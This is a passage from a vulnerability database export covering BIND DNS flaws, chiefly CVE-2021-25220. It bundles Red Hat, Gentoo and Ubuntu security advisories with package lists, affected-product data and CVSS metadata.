"db": "PACKETSTORM",
"id": "163188",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163149",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163242",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162881",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162882",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162890",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162977",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-3501",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-05-06T00:00:00",
"db": "VULHUB",
"id": "VHN-391161",
"ident": null
},
{
"date": "2021-05-06T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3501",
"ident": null
},
{
"date": "2021-06-17T17:53:22",
"db": "PACKETSTORM",
"id": "163188",
"ident": null
},
{
"date": "2021-06-15T14:59:25",
"db": "PACKETSTORM",
"id": "163149",
"ident": null
},
{
"date": "2021-06-22T19:34:25",
"db": "PACKETSTORM",
"id": "163242",
"ident": null
},
{
"date": "2021-06-01T15:03:46",
"db": "PACKETSTORM",
"id": "162881",
"ident": null
},
{
"date": "2021-06-01T15:04:05",
"db": "PACKETSTORM",
"id": "162882",
"ident": null
},
{
"date": "2021-06-01T15:11:57",
"db": "PACKETSTORM",
"id": "162890",
"ident": null
},
{
"date": "2021-06-04T13:47:07",
"db": "PACKETSTORM",
"id": "162977",
"ident": null
},
{
"date": "2021-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-271",
"ident": null
},
{
"date": "2022-01-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-006584",
"ident": null
},
{
"date": "2021-05-06T13:15:12.840000",
"db": "NVD",
"id": "CVE-2021-3501",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-05-13T00:00:00",
"db": "VULHUB",
"id": "VHN-391161",
"ident": null
},
{
"date": "2021-05-14T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3501",
"ident": null
},
{
"date": "2021-06-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-271",
"ident": null
},
{
"date": "2022-01-13T08:56:00",
"db": "JVNDB",
"id": "JVNDB-2021-006584",
"ident": null
},
{
"date": "2022-05-13T20:52:55.127000",
"db": "NVD",
"id": "CVE-2021-3501",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "162977"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Out-of-bounds Vulnerability in Microsoft",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
}
],
"trust": 0.6
}
}
VAR-202203-0664
Vulnerability from variot - Updated: 2026-04-10 22:16BIND 9.11.0 -> 9.11.36 9.12.0 -> 9.16.26 9.17.0 -> 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -> 9.11.36-S1 9.16.8-S1 -> 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL. The cache could become poisoned with incorrect records leading to queries being made to the wrong servers, which might also result in false information being returned to clients. Bogus NS records supplied by the forwarders may be cached and used by name if it needs to recurse for any reason. This issue causes it to obtain and pass on potentially incorrect answers. (CVE-2021-25220) By flooding the target resolver with queries exploiting this flaw an attacker can significantly impair the resolver's performance, effectively denying legitimate clients access to the DNS resolution service. (CVE-2022-2795) By spoofing the target resolver with responses that have a malformed ECDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources. (CVE-2022-38177) By spoofing the target resolver with responses that have a malformed EdDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources. (CVE-2022-38178). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: bind security update Advisory ID: RHSA-2023:0402-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:0402 Issue date: 2023-01-24 CVE Names: CVE-2021-25220 CVE-2022-2795 ==================================================================== 1. Summary:
An update for bind is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.
Security Fix(es):
-
bind: DNS forwarders - cache poisoning vulnerability (CVE-2021-25220)
-
bind: processing large delegations may severely degrade resolver performance (CVE-2022-2795)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing the update, the BIND daemon (named) will be restarted automatically.
- Bugs fixed (https://bugzilla.redhat.com/):
2064512 - CVE-2021-25220 bind: DNS forwarders - cache poisoning vulnerability 2128584 - CVE-2022-2795 bind: processing large delegations may severely degrade resolver performance
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: bind-9.11.4-26.P2.el7_9.13.src.rpm
noarch: bind-license-9.11.4-26.P2.el7_9.13.noarch.rpm
x86_64: bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: bind-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: bind-9.11.4-26.P2.el7_9.13.src.rpm
noarch: bind-license-9.11.4-26.P2.el7_9.13.noarch.rpm
x86_64: bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: bind-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: bind-9.11.4-26.P2.el7_9.13.src.rpm
noarch: bind-license-9.11.4-26.P2.el7_9.13.noarch.rpm
ppc64: bind-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.ppc.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-libs-9.11.4-26.P2.el7_9.13.ppc.rpm bind-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.ppc.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-utils-9.11.4-26.P2.el7_9.13.ppc64.rpm
ppc64le: bind-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-chroot-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-utils-9.11.4-26.P2.el7_9.13.ppc64le.rpm
s390x: bind-9.11.4-26.P2.el7_9.13.s390x.rpm bind-chroot-9.11.4-26.P2.el7_9.13.s390x.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.s390.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.s390x.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.s390.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.s390x.rpm bind-libs-9.11.4-26.P2.el7_9.13.s390.rpm bind-libs-9.11.4-26.P2.el7_9.13.s390x.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.s390.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.s390x.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.s390x.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.s390.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.s390x.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.s390x.rpm bind-utils-9.11.4-26.P2.el7_9.13.s390x.rpm
x86_64: bind-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-devel-9.11.4-26.P2.el7_9.13.ppc.rpm bind-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.ppc.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.ppc.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.ppc64.rpm
ppc64le: bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-sdb-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.ppc64le.rpm
s390x: bind-debuginfo-9.11.4-26.P2.el7_9.13.s390.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.s390x.rpm bind-devel-9.11.4-26.P2.el7_9.13.s390.rpm bind-devel-9.11.4-26.P2.el7_9.13.s390x.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.s390.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.s390x.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.s390.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.s390x.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.s390.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.s390x.rpm bind-sdb-9.11.4-26.P2.el7_9.13.s390x.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.s390x.rpm
x86_64: bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: bind-9.11.4-26.P2.el7_9.13.src.rpm
noarch: bind-license-9.11.4-26.P2.el7_9.13.noarch.rpm
x86_64: bind-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2021-25220 https://access.redhat.com/security/cve/CVE-2022-2795 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBY9AIs9zjgjWX9erEAQiz9BAAiQvmAQ5DWdOQbHHizPAHBnKnBtNBfCT3 iaAzKQ0Yrpk26N9cdrvcBJwdrHpI28VJ3eemFUxQFseUqtAErsgfL4QqnjPjQgsp U2qLPjqbzfOrbi1CuruMMIIbtxfwvsdic8OB9Zi7XzfZjWm2X4c6Ima+QXol6x9a 8J2qdzCqhoYUXJgdpVK9nAAGsPtidcnqLYYIcTclJArp6uRSlEEk7EbNJvs2SAbj MUo5aq5BoVy2TkiMyqhT5voy6K8f4c7WbQYerNieps18541ZSr29fAzWBznr3Yns gE10Aaoa8uCxlaexFR8EahPVYe6wJAm6R62LBabEWChbzW0oxr7X2DdzX9eiOwl0 wJT0n4GHoFsCGMa+v1yybkjHIUfiW25WC7bC4QDj4fjTpbicVlnttXhQJwCJK5bb PC27GE6qi7EqwHYJa/jPenbIG38mXj/r2bwIr1qYQMLjQ8BQIneShky3ZWE4l/jd zTMwGVal8ACBYdCALx/O9QNyzaO92xHLnKl3DIoqaQdjasIfGp/G6Xc1YggKyZAP VVtXPiOIbReBVNWiBXMH1ZEQeNon4su0/MbMWrmJpwvEzYeXkuWO98LZ4dlLVuim NG/dJ6RqzT6/aqRNVyOt5s4SLIQ5DrPXoPnZRUBsbpWhP6lxPhESKA0TUg5FYz33 eDGIrZR4jEY=azJw -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 9) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network. 8) - aarch64, ppc64le, s390x, x86_64
-
Gentoo Linux Security Advisory GLSA 202210-25
https://security.gentoo.org/
Severity: Low Title: ISC BIND: Multiple Vulnerabilities Date: October 31, 2022 Bugs: #820563, #835439, #872206 ID: 202210-25
Synopsis
Multiple vulnerabilities have been discovered in ISC BIND, the worst of which could result in denial of service.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dns/bind < 9.16.33 >= 9.16.33 2 net-dns/bind-tools < 9.16.33 >= 9.16.33
Description
Multiple vulnerabilities have been discovered in ISC BIND. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All ISC BIND users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-dns/bind-9.16.33"
All ISC BIND-tools users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-dns/bind-tools-9.16.33"
References
[ 1 ] CVE-2021-25219 https://nvd.nist.gov/vuln/detail/CVE-2021-25219 [ 2 ] CVE-2021-25220 https://nvd.nist.gov/vuln/detail/CVE-2021-25220 [ 3 ] CVE-2022-0396 https://nvd.nist.gov/vuln/detail/CVE-2022-0396 [ 4 ] CVE-2022-2795 https://nvd.nist.gov/vuln/detail/CVE-2022-2795 [ 5 ] CVE-2022-2881 https://nvd.nist.gov/vuln/detail/CVE-2022-2881 [ 6 ] CVE-2022-2906 https://nvd.nist.gov/vuln/detail/CVE-2022-2906 [ 7 ] CVE-2022-3080 https://nvd.nist.gov/vuln/detail/CVE-2022-3080 [ 8 ] CVE-2022-38177 https://nvd.nist.gov/vuln/detail/CVE-2022-38177 [ 9 ] CVE-2022-38178 https://nvd.nist.gov/vuln/detail/CVE-2022-38178
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202210-25
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . ========================================================================== Ubuntu Security Notice USN-5332-1 March 17, 2022
bind9 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.10
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in Bind.
Software Description: - bind9: Internet Domain Name Server
Details:
Xiang Li, Baojun Liu, Chaoyi Lu, and Changgen Zou discovered that Bind incorrectly handled certain bogus NS records when using forwarders. A remote attacker could possibly use this issue to manipulate cache results. (CVE-2021-25220)
It was discovered that Bind incorrectly handled certain crafted TCP streams. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. This issue only affected Ubuntu 21.10. (CVE-2022-0396)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.10: bind9 1:9.16.15-1ubuntu1.2
Ubuntu 20.04 LTS: bind9 1:9.16.1-0ubuntu2.10
Ubuntu 18.04 LTS: bind9 1:9.11.3+dfsg-1ubuntu1.17
In general, a standard system update will make all the necessary changes
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.11.0"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.12.0"
},
{
"_id": null,
"model": "sinec ins",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.16.8"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "19.4"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "20.4"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "21.2"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.17.0"
},
{
"_id": null,
"model": "junos",
"scope": "lt",
"trust": 1.0,
"vendor": "juniper",
"version": "19.3"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "22.1"
},
{
"_id": null,
"model": "bind",
"scope": "lte",
"trust": 1.0,
"vendor": "isc",
"version": "9.18.0"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "19.3"
},
{
"_id": null,
"model": "sinec ins",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "22.2"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "21.3"
},
{
"_id": null,
"model": "bind",
"scope": "lt",
"trust": 1.0,
"vendor": "isc",
"version": "9.11.37"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "20.3"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "20.2"
},
{
"_id": null,
"model": "bind",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "9.11.4"
},
{
"_id": null,
"model": "bind",
"scope": "lt",
"trust": 1.0,
"vendor": "isc",
"version": "9.16.27"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "21.4"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "36"
},
{
"_id": null,
"model": "junos",
"scope": "eq",
"trust": 1.0,
"vendor": "juniper",
"version": "21.1"
},
{
"_id": null,
"model": "fedora",
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": "bind",
"scope": null,
"trust": 0.8,
"vendor": "isc",
"version": null
},
{
"_id": null,
"model": "esmpro/serveragent",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u672c\u96fb\u6c17",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
},
"credits": {
"_id": null,
"data": "Siemens reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
}
],
"trust": 0.6
},
"cve": "CVE-2021-25220",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CVE-2021-25220",
"impactScore": 2.9,
